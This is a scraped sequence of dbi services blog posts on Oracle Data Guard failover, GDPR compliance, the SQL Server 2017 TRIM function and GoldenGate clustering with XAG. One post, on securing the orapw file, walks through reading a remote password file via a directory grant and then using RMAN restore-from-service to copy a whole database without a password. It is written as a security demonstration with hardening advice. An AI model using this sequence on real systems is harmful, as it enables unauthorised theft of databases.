SUCCESS (status updated 49 seconds ago)
 
DGMGRL> ENABLE FAST_START FAILOVER ;
Enabled.
DGMGRL> start observer;
[W000 01/09 17:09:16.20] FSFO target standby is TISMEDS2
[W000 01/09 17:09:20.18] Observer trace level is set to USER
[W000 01/09 17:09:20.19] Try to connect to the primary.
[W000 01/09 17:09:20.20] Try to connect to the primary TISMEDS1.
[W000 01/09 17:09:20.28] The standby TISMEDS2 is ready to be a FSFO target
[W000 01/09 17:09:22.29] Connection to the primary restored!
[W000 01/09 17:09:24.35] Disconnecting from database TISMEDS1.
[W000 01/09 17:10:32.84] Primary database cannot be reached.
[W000 01/09 17:10:49.29] Primary database cannot be reached.
[W000 01/09 17:10:49.30] Fast-Start Failover threshold has expired.
[W000 01/09 17:10:49.31] Try to connect to the standby.
[W000 01/09 17:10:49.32] Making a last connection attempt to primary database before proceeding with Fast-Start Failover.
[W000 01/09 17:10:49.33] Check if the standby is ready for failover.
[S002 01/09 17:10:50.03] Fast-Start Failover started...
 
17:10:50.04 Tuesday, January 09, 2018
Initiating Fast-Start Failover to database "TISMEDS2"...
[S002 01/09 17:10:50.05] Initiating Fast-start Failover.
Performing failover NOW, please wait...
Unable to connect to database using TISMEDS1
ORA-12543: TNS:destination host unreachable
 
Failover succeeded, new primary is "TISMEDS2"
17:10:52.79 Tuesday, January 09, 2018
[S002 01/09 17:10:52.80] Fast-Start Failover finished...
[W000 01/09 17:10:52.81] Failover succeeded. Restart pinging.
[W000 01/09 17:10:52.88] Primary database has changed to TISMEDS2.
[W000 01/09 17:10:52.91] Try to connect to the primary.
[W000 01/09 17:10:52.92] Try to connect to the primary TISMEDS2.
[W000 01/09 17:10:54.33] The standby TISMEDS1 needs to be reinstated
[W000 01/09 17:10:54.34] Try to connect to the new standby TISMEDS1.
[W000 01/09 17:10:54.35] Connection to the primary restored!
Unable to connect to database using TISMEDS1
ORA-12543: TNS:destination host unreachable
 
[W000 01/09 17:10:56.36] Disconnecting from database TISMEDS2.
[W000 01/09 17:11:24.84] Try to connect to the new standby TISMEDS1.
Unable to connect to database using TISMEDS1
ORA-12543: TNS:destination host unreachable
 
[W000 01/09 17:11:54.85] Try to connect to the new standby TISMEDS1.
Unable to connect to database using TISMEDS1
ORA-12541: TNS:no listener
 
[W000 01/09 17:12:24.17] Try to connect to the new standby TISMEDS1.
Unable to connect to database using TISMEDS1
ORA-12541: TNS:no listener
 
[W000 01/09 17:12:54.54] Try to connect to the new standby TISMEDS1.
[W000 01/09 17:12:57.58] Connection to the new standby restored!
[W000 01/09 17:12:57.63] Failed to ping the new standby.
[W000 01/09 17:12:58.64] Try to connect to the new standby TISMEDS1.
[W000 01/09 17:13:00.65] Connection to the new standby restored!
[W000 01/09 17:13:32.32] Try to connect to the primary TISMEDS2.
[W000 01/09 17:13:34.36] Connection to the primary restored!
[W000 01/09 17:13:35.37] Wait for new primary to be ready to reinstate.
[W000 01/09 17:13:36.38] New primary is now ready to reinstate.
[W000 01/09 17:13:36.38] Issuing REINSTATE command.
 
17:13:36.39 Tuesday, January 09, 2018
Initiating reinstatement for database "TISMEDS1"...
Reinstating database "TISMEDS1", please wait...
[W000 01/09 17:13:54.64] The standby TISMEDS1 is ready to be a FSFO target
Reinstatement of database "TISMEDS1" succeeded
17:13:56.24 Tuesday, January 09, 2018
[W000 01/09 17:13:56.65] Successfully reinstated database TISMEDS1.
[W000 01/09 17:13:57.70] The reinstatement of standby TISMEDS1 was just done

Summary: Is it possible to run an Oracle client on the Rasberry Pi? Yes, it is! Running native Java-applications using JDBC Thin Connections is not a problem at all. Running a fat Oracle Client is possible as well using x86 emulation software. Is this supported by Oracle? I do assume that like with any other non-Oracle-VM-solution you would have to prove possible issues by reproducing the problem on a bare metal x86 platform to be able to open a Service Request.

Anyway, if you plan to run an Oracle 18c XE DB at home (see e.g. here
https://ora-00001.blogspot.de/2017/10/oracle-xe-12c-becomes-oracle-xe-18c.html )
then you might consider running your client on a Raspberry Pi ;-)

 

Cet article Running the Oracle Client on a Raspberry Pi est apparu en premier sur Blog dbi services.

Keep your orapw password file secure

Fri, 2018-01-05 06:02

This is a small demo I did when I’ve found a database password file (orapw) lying around in /tmp with -rw-rw-rw- permissions, to show how this is a bad idea. People think that the orapw file only contains hashes to validate a password given, and forget that it can be used to connect to a remote database without password.

I can easily imagine why the orapwd was there in /tmp. To build a standby database, you need to copy the password file to the standby server. If you don’t have direct access to the oracle user, but only a sudo access for ‘security reasons’, you can’t scp easily. Then you copy the file to /tmp, make it readable by all users, and you can scp with your user.

In this demo I don’t even have access to the host. I’ve only access to connect to a PDB with the SCOTT users, reated with utlsampl.sql, with those additional privileges, a read access on $ORACLE_HOME/dbs:

SQL> connect sys/oracle@//192.168.56.122/PDB1 as sysdba

Connected.

SQL> create or replace directory DBS as '/u01/app/oracle/product/12.2.0/dbhome_1/dbs';

Directory DBS created.

SQL> grant read on directory DBS to SCOTT;

Grant succeeded.
People tend to grant many privileges, and think that a read access on a directory which is supposed to contain only configuration files is harmless. Let’s see what you can do from another server.

Get the orapw file from a remote connection

I connect with SCOTT which can read from ORACLE_HOME/dbs:

SQL> connect scott/tiger@//192.168.56.122/PDB1

Connected.

SQL> show user

USER is "SCOTT"

SQL> select * from all_directories;

OWNER DIRECTORY_NAME DIRECTORY_PATH ORIGIN_CON_ID

----- -------------- -------------- -------------

SYS DBS /u01/app/oracle/product/12.2.0/dbhome_1/dbs 4
I create a table to read this file (other possibilities utl_tile, external tables,…):

SQL> create table DEMO ( b blob );

Table DEMO created.

SQL> insert into demo values ( bfilename('DBS','orapwCDB1') );

1 row inserted.
I’m on another server with the same version of Oracle Database software installed.

I use sqlplus to retrieve the server file to my client:

sqlcl -s scott/tiger@//192.168.56.120/PDB1 < $ORACLE_HOME/dbs/orapwCDB1

set pages 0 lin 17000 long 1000000000 longc 16384

select * from DEMO;

exit

EOF
This (documented by Laurent Schneider) uses sqlplus to display the BLOB variable as hexadecimal code and xdd (installed with vim-common) to revert it to binary.

So, on my server I have a copy of the database password file for the database I want to steal:

[oracle@VM122 ~]$ strings /u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapwCDB1

ORACLE Remote Password file

X)l)|

SYSDG

+933k\

SYSBACKUP

f ts6 $9

SYSKM
Pull

A nice feature of 12c is the ability to pull backups from a service. With this, it is the destination that connects to the source. I have diagrams to explain here). It is an easy alternative to RMAN DUPLICATE (see MOS Doc ID 2283978.1 Creating a Physical Standby database using RMAN restore from service). And one difference is that you don’t have to provide the password:

I prepare a small init.ora and directory for the datafiles

echo "db_name=CDB1" > $ORACLE_HOME/dbs/initCDB1.ora

mkdir -p /u01/oradata/CDB1
I’m still on my server with the copy of the remote orapw file and a network access to the source database and I just restore it, without the need for a password:

RMAN> connect target /

connected to target database (not started)
I start a local instance:

RMAN> startup nomount force

Oracle instance started

Total System Global Area 859832320 bytes

Fixed Size 8798552 bytes

Variable Size 784338600 bytes

Database Buffers 58720256 bytes

Redo Buffers 7974912 bytes
I restore the controlfile:

RMAN> restore controlfile from service '//192.168.56.122/CDB1';

Starting restore at 05-JAN-18

using target database control file instead of recovery catalog

allocated channel: ORA_DISK_1

channel ORA_DISK_1: SID=262 device type=DISK

channel ORA_DISK_1: starting datafile backup set restore

channel ORA_DISK_1: using network backup set from service //192.168.56.122/CDB1

channel ORA_DISK_1: restoring control file

channel ORA_DISK_1: restore complete, elapsed time: 00:00:02

output file name=/u01/oradata/CDB1/control01.ctl

output file name=/u01/fast_recovery_area/CDB1/control02.ctl

Finished restore at 05-JAN-18
That’s the interesting part because it has to be connected, at least as SYSOPER, to the source database but I didn’t provide any password.

I mount this controlfile locally:

RMAN> alter database mount;

Statement processed

released channel: ORA_DISK_1
And now it is easy to pull the whole database (the CDB with all its PDBs) to my local server:

RMAN> restore database from service '//192.168.56.122/CDB1';

Starting restore at 05-JAN-18

Starting implicit crosscheck backup at 05-JAN-18

allocated channel: ORA_DISK_1

channel ORA_DISK_1: SID=262 device type=DISK

Crosschecked 6 objects

Finished implicit crosscheck backup at 05-JAN-18

Starting implicit crosscheck copy at 05-JAN-18

using channel ORA_DISK_1

Finished implicit crosscheck copy at 05-JAN-18

searching for all files in the recovery area

cataloging files...

cataloging done

List of Cataloged Files

=======================

File Name: /u01/fast_recovery_area/CDB1/autobackup/2018_01_04/o1_mf_s_964524009_f4vzyt59_.bkp

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_15_f4w5vv19_.arc

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_16_f4wmm0t8_.arc

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_14_f4vzjdl1_.arc

using channel ORA_DISK_1

channel ORA_DISK_1: starting datafile backup set restore

channel ORA_DISK_1: using network backup set from service //192.168.56.122/CDB1

channel ORA_DISK_1: specifying datafile(s) to restore from backup set

channel ORA_DISK_1: restoring datafile 00001 to /u01/oradata/CDB1/system01.dbf

channel ORA_DISK_1: restore complete, elapsed time: 00:00:16

channel ORA_DISK_1: starting datafile backup set restore

...
So what?

This is not an issue and is totally expected. In a Data Guard configuration, the primary and standby database have to communicate with each others and then need a passwordless authentication. This is done with the password file, and this is the reason why you need to copy it rather than just create another one with the same passwords.

So, there is more than just a hash of the password (which is required to validate a password) and probably includes a key (randomly generated when you create the password file) used for passwordless authentication.

Then, be careful, and do not give read access to the orapw files. You must secure them in the same way as a ssh key or an encryption wallet. and this include:

  • Do not leave a copy of the orapw file in a shared location
  • Be careful with grants on directories, even in READ
  • Do not grant CREATE ANY DIRECTORY except for a PDB with PATH_PREFIX lockdown
 

Cet article Keep your orapw password file secure est apparu en premier sur Blog dbi services.

GDPR compliant by installing software editors tools?

Fri, 2018-01-05 02:51

In few months (25 May 2018) the EU General Data Protection Regulation (GDPR) will be in force and will replace the Data Protection Directive 95/46/EC. His goals are to harmonize data privacy laws across Europe, to protect and empower all EU citizens’ data privacy and to reshape the way organizations across the region approach data privacy. You can find all information related to GDPR on https://www.eugdpr.org and the official PDF of the Regulation (EU) 2016/679 on https://gdpr-info.eu/

GDPR

GDPR

 

The biggest change of GDPR compared to Data Protection Directive 95/46/EC is perhaps the extended jurisdiction as it applies to all companies processing the personal data of data subjects residing in the Union, regardless of the company’s location. But other key points such a penalties, consent, breach notification, right to access, right to be forgotten, data portability, privacy by design and data protection officers have been added to this Regulation.

From 25 May 2018 on, non-compliant organizations will face heavy penalties in terms of fine and reputation. Indeed according to the Regulation, non-compliant organizations can be fined up to 4% of annual global turnover for breaching GDPR or €20 Million. However there is no minimum fine or even an automatic fine in case of violation. To decide whether to impose a fine and its amount, the following items can be taken into consideration: the nature, severity and duration of the violation, the number of persons impacted, the impact on the persons, the measures taken to mitigate the damage, first or subsequent breach, and finaly the cooperation with the authority to remedy the violation. There is currently no clear procedure for a foreign authority to collect the fine imposed on a Swiss company without presence in the EU.

The impact of the GDPR is worldwide since it doesn’t only affect EU organization but all companies processing and holding the personal data of data subjects residing in the European Union, regardless of the company’s location. Meaning that all countries (even Switzerland and UK) are affected. You can find the official information regarding GDPR provided by the Swiss Confederation on the following link and the current Federal Act on Data protection here (Note: The Swiss Data Protection Act which is currently under revision will incorporate key regulations similar to the GDPR).  You can find the status of the UK Data Protection Bill on the Following link.

According to the GDPR the personal data definition is the following:
Any information related to a natural person or ‘Data Subject’, that can be used to directly or indirectly identify the person. It can be anything from a name, a photo, an email address, bank details, posts on social networking websites, medical information, or a computer IP address.

To protect these personal data, the GDPR has 99 articles divided in 11 chapters. Two of these articles, the article 25 (Data protection by design and default) and article 32 (Security of Processing) are usually put forward by software vendors: Oracle, Microsoft, IBM. These editors usually use these articles to promote encryption and anonymization tools which can make sense depending on the personal data hosted as the GDPR requires an adapted approach, depending on the nature and the scope of the personal data impacted. Indeed, encryption at rest may be appropriate depending on the circumstances, but they are not mandated by the GDPR in every instance.

In other terms the technical tools can help to be in conformity regarding a small subset of the Regulation but the GDPR is mostly about processes related to personal data identification and treatment. You will probably have a better understanding of what I mean by having a look on the two checklists (one for data controllers and one for data processors) provided by the ICO (UK Information Commissioner’s Office) on the following link. After having completed the checklist you will get an overall rating, a list of suggested actions and guidance.

 

Cet article GDPR compliant by installing software editors tools? est apparu en premier sur Blog dbi services.

SQL Server 2017: TRIM not only a replacement of RTRIM and LTRIM

Thu, 2018-01-04 10:38

Last month, I present in the IT-Tage 2017 in Frankfurt am Main, a session about SQL Server 2017 overview.
During my session I made a demo on one of the new string T-SQL Commands: TRIM.
My demo was very simple but I have also 2 very good questions.

Before, I write about these question, I will show you what is TRIM.
This function is a replacement of RTRIM and LTRIM to delete all space character before and after a string.

SELECT Name, RTRIM(LTRIM(Name)) as RLTrim_name, TRIM(Name) as Trim_name 
FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

trim01

As you can see in the result of the query, TRIM() do the same as RTRIM(LTRIM()).

But TRIM can also have a second usage and you can give a set of characters to be deleted and this use case is very useful.

I made an example with this query to delete all A,n & e from my precedent query:

SELECT Name, TRIM('A,n,e' FROM Name)  as Trim_name, TRIM('A,n,e, ' FROM Name)  as Trim_name2
FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

trim02

In the result in the column Trim_name, I haven’t what I expected… The problem is that all name values begin or end with several space characters.
I you look the Trim_name2 column and his associated query, you will see that I add a space character in the special characters’ list.
The first interesting question was:

Can I use the char(xx) to define the character to be deleted?

The ASCII code for a Space is 32 (20 in Hex). I test my query with char(32) like this:

SELECT Name, TRIM(char(32) FROM Name)  as Trim_name 
FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

I run the query…

trim03
Yes, it’s works! I can see that my result is without space character.
Now, I try with another character: char(65) à A

SELECT Name, TRIM(char(32) FROM Name) as Trim_name , TRIM(char(65) FROM Name)  as Trim_name2 
FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

trim04

The result is what I expected with a deleted A at the beginning of the string.
My last test is with both characters together in the same Trim function like this:

SELECT Name, TRIM(char(32),char(65) FROM Name) as Trim_name 
FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

trim05

As you can see, I get an error. Incorrect syntax near the keyword ‘FROM’.

This way is perhaps not the good way and I try another syntax with ‘char(32),char(65)':

SELECT Name, TRIM('char(32),char(65)' FROM Name) as Trim_name

FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

trim06

The result is very strange. The character A at the beginning of the string is deleted but not the space character…

This does not work! :oops:

Let’s go to the second question
The second question was:

Can I use a variable?

My first test with a variable is very simple with the same characters set that I use in my demo:

DECLARE @characters nvarchar(10);
SET @characters= 'A,n,e, '
SELECT Name, TRIM(@characters FROM Name)  as Trim_name FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

trim07
It’s working fine.
Now, I will try with the ASCII code.

First I try with one characters :

DECLARE @characters nvarchar(10);
SET @characters= char(32)
SELECT Name, TRIM(@characters FROM Name)  as Trim_name FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

trim11

I try with several characters.

DECLARE @characters nvarchar(10);
SET @characters= 'char(32),char(65)'
SELECT Name, TRIM(@characters FROM Name)  as Trim_name FROM [GoT].[dbo].[character-deaths2] Where Name like '%Aegon Targaryen%'

trim08
As you can see, the variable with several characters in ASCII code does not work.

Summary

To finish, I summarize all my tests in a little report:

Direct characters set ok Space character in ASCII code ok One character in ASCII code ok Multiple characters in ASCII code nok Variable with several characters ok Variable with one character in ASCII code ok Variable with multiple characters in ASCII code nok

 

 

Cet article SQL Server 2017: TRIM not only a replacement of RTRIM and LTRIM est apparu en premier sur Blog dbi services.

GoldenGate 12.2.0.2 installation in a Grid infrastructure12cR2

Thu, 2018-01-04 08:55

This post is a demonstration on how to deploy a fully supported Oracle GoldenGate as cluster resources.

We are going to use the Oracle Grid Infrastructure Agents, called XAG to integrate the GoldenGate instance within our cluster as a cluster managed resource. This tool is provided by Oracle in the binaries with the release 12c and later but it is recommended to download and use the last version out of the box (available here).

This XAG provide an interface “agctl” which enable us to interact with GoldenGate resources the same way as “srvctl” does for Oracle database resources within the Oracle cluster. This tool support various product that can be integrated to the Oracle cluster like Tomcat, MySQL and so on.

Here what’s can be done with XAG:

[oracle@rac001 ~]$ agctl
Manages Apache Tomcat, Apache Webserver, Goldengate, JDE Enterprise Server, MySQL Server, Peoplesoft App Server, Peoplesoft Batch Server, Peoplesoft PIA Server, Siebel Gateway, Siebel Server, WebLogic Administration Server as Oracle Clusterware Resources

Usage: agctl <verb> <object> [<options>]
   verbs: add|check|config|disable|enable|modify|query|relocate|remove|start|status|stop
   objects: apache_tomcat|apache_webserver|goldengate|jde_enterprise_server|mysql_server|peoplesoft_app_server|peoplesoft_batch_server|peoplesoft_pia_server|siebel_gateway|siebel_server|weblogic_admin_server
For detailed help on each verb and object and its options use:
   agctl <verb> --help or
   agctl <verb> <object> --help

We are going to deploy that GoldenGate HA configuration on top of our existing 12.2 Grid Infrastructure. I choose for that demo to deploy the whole GoldenGate instance and its binaries to a dedicated mount point using ACFS to be sure my GoldenGate resources will have access to their data regardless of the node where the GoldenGate instance will be running. Could also be a DBFS or NFS.

Step 1 – Create an ACFS mount point called /acfsgg

[oracle@rac001 Disk1]$ /u01/app/12.2.0/grid/bin/asmcmd volcreate -G DGFRA -s 4G --width 1M --column 8 ACFSGG

[root@rac001 ~]# /sbin/mkfs -t acfs /dev/asm/acfsgg-215
[root@rac001 ~]# /u01/app/12.2.0/grid/bin/srvctl add filesystem -d /dev/asm/acfsgg-215 -m /acfsgg -u oracle -fstype ACFS -autostart ALWAYS
[root@rac001 ~]# /u01/app/12.2.0/grid/bin/srvctl start filesystem -d /dev/asm/acfsgg-215
[root@rac001 ~]# chown oracle:oinstall /acfsgg
[root@rac001 ~]# chmod 775 /acfsgg

[oracle@rac001 ~]$ ./execall "df -hT /acfsgg"
rac001: Filesystem          Type  Size  Used Avail Use% Mounted on
rac001: /dev/asm/acfsgg-215 acfs  4.0G   85M  4.0G   3% /acfsgg
rac002: Filesystem          Type  Size  Used Avail Use% Mounted on
rac002: /dev/asm/acfsgg-215 acfs  4.0G   85M  4.0G   3% /acfsgg

 

Step 2 – install GoldenGate binaries in /acfsgg

cd /u01/install/
unzip 122022_fbo_ggs_Linux_x64_shiphome.zip
cd fbo_ggs_Linux_x64_shiphome/Disk1

[oracle@rac001 Disk1]$ ./runInstaller -silent -nowait -showProgress \
INSTALL_OPTION=ORA12c \
SOFTWARE_LOCATION=/acfsgg \
START_MANAGER=false \
MANAGER_PORT= \
DATABASE_LOCATION= \
INVENTORY_LOCATION=/u01/app/oraInventory \
UNIX_GROUP_NAME=oinstall

[...]
Finish Setup successful.
The installation of Oracle GoldenGate Core was successful.
Please check '/u01/app/oraInventory/logs/silentInstall2018-01-04_06-37-02AM.log' for more details.
Successfully Setup Software.

 

Step 3 – install the last version of XAG (recommended by Oracle) in all nodes

# creation of the XAG home on all nodes as root
[root@rac001 ~]# mkdir /u01/app/xag
[root@rac001 ~]# chown oracle. /u01/app/xag

# back as oracle
[oracle@rac001 ~]$ cd /u01/install/
[oracle@rac001 install]$ unzip xagpack.zip
[oracle@rac001 xag]$ cd xag

[oracle@rac001 xag]$ export XAG_HOME=/u01/app/xag

[oracle@rac001 xag]$ ./xagsetup.sh --install --directory $XAG_HOME --all_nodes
Installing Oracle Grid Infrastructure Agents on: rac001
Installing Oracle Grid Infrastructure Agents on: rac002
Done.

[oracle@rac001 xag]$ /u01/app/12.2.0/grid/bin/agctl query releaseversion
The Oracle Grid Infrastructure Agents release version is 7.1.0

[oracle@rac001 xag]$ $XAG_HOME/bin/agctl query releaseversion
The Oracle Grid Infrastructure Agents release version is 8.1.0

 

Step 4 – configure GoldenGate instance and the manager

[oracle@rac002 acfsgg]$ export ORACLE_HOME=/u01/app/oracle/product/12.2.0/dbhome_1
[oracle@rac002 acfsgg]$ export LD_LIBRARY_PATH=$ORACLE_HOME/lib
[oracle@rac002 acfsgg]$ ./ggsci

Oracle GoldenGate Command Interpreter for Oracle
Version 12.2.0.2.2 OGGCORE_12.2.0.2.0_PLATFORMS_170630.0419_FBO
Linux, x64, 64bit (optimized), Oracle 12c on Jun 30 2017 16:12:28
Operating system character set identified as UTF-8.

Copyright (C) 1995, 2017, Oracle and/or its affiliates. All rights reserved.


GGSCI (rac001) 1> CREATE SUBDIRS

Creating subdirectories under current directory /acfsgg

Parameter files                /acfsgg/dirprm: created
Report files                   /acfsgg/dirrpt: created
Checkpoint files               /acfsgg/dirchk: created
Process status files           /acfsgg/dirpcs: created
SQL script files               /acfsgg/dirsql: created
Database definitions files     /acfsgg/dirdef: created
Extract data files             /acfsgg/dirdat: created
Temporary files                /acfsgg/dirtmp: created
Credential store files         /acfsgg/dircrd: created
Masterkey wallet files         /acfsgg/dirwlt: created
Dump files                     /acfsgg/dirdmp: created

GGSCI (rac001) 2> edit params mgr

PORT 7809
AUTORESTART ER *, RETRIES 3, WAITMINUTES 3, RESETMINUTES 10
AUTOSTART ER *
PURGEOLDEXTRACTS ./dirdat/*, USECHECKPOINTS
LAGCRITICALMINUTES 5
LAGREPORTMINUTES 60
LAGINFOMINUTES 0

 

Step 5 – Add the GoldenGate resource to the cluster

[root@rac001 ~]# export XAG_HOME=/u01/app/xag
[root@rac001 ~]# $XAG_HOME/bin/agctl add goldengate GGAPP01 --gg_home /acfsgg --instance_type source --oracle_home /u01/app/oracle/product/12.2.0/dbhome_1 --ip 192.168.179.15 --network 1 --user oracle --filesystems ora.dgfra.acfsgg.acfs
Calling POSIX::isdigit() is deprecated at /u01/app/xag/agcommon.pm line 809.

## all parameters in above command are required except the FS specification

[oracle@rac001 ~]$ $XAG_HOME/bin/agctl start goldengate GGAPP01

[oracle@rac001 ~]$ $XAG_HOME/bin/agctl status goldengate GGAPP01
Goldengate  instance 'GGAPP01' is running on rac001

[oracle@rac001 ~]$ /u01/app/12.2.0/grid/bin/crsctl stat res -t
[...]
Cluster Resources
--------------------------------------------------------------------------------
[...]
xag.GGAPP01-vip.vip
      1        ONLINE  ONLINE       rac001                   STABLE
xag.GGAPP01.goldengate
      1        ONLINE  ONLINE       rac001                   STABLE
--------------------------------------------------------------------------------

At this stage we have an operational GoldenGate fully managed by the cluster and ready to be configured for replication.

In case of failure of the node running the Manager, the cluster will restart the Manger process on first remaining available node. As soon as the Manager start, it will automatically restart all Extract and Replicate processes as we instruct it in the Manager configuration file (parameter AUTOSTART). The restarting of Extraction and Replication processes will be also done by the Manager and not by the cluster (so far with this release).

We can add Extract and Replicate processes as cluster resources but in this case it will only be monitored by the cluster and the cluster will update their states with ONLINE, OFFLINE, INTERMEDIATE or UNKNOWN depending the scenario.

I hope it may help and please do not hesitate to contact us if you have any questions or require further information.

 

Cet article GoldenGate 12.2.0.2 installation in a Grid infrastructure12cR2 est apparu en premier sur Blog dbi services.

Pages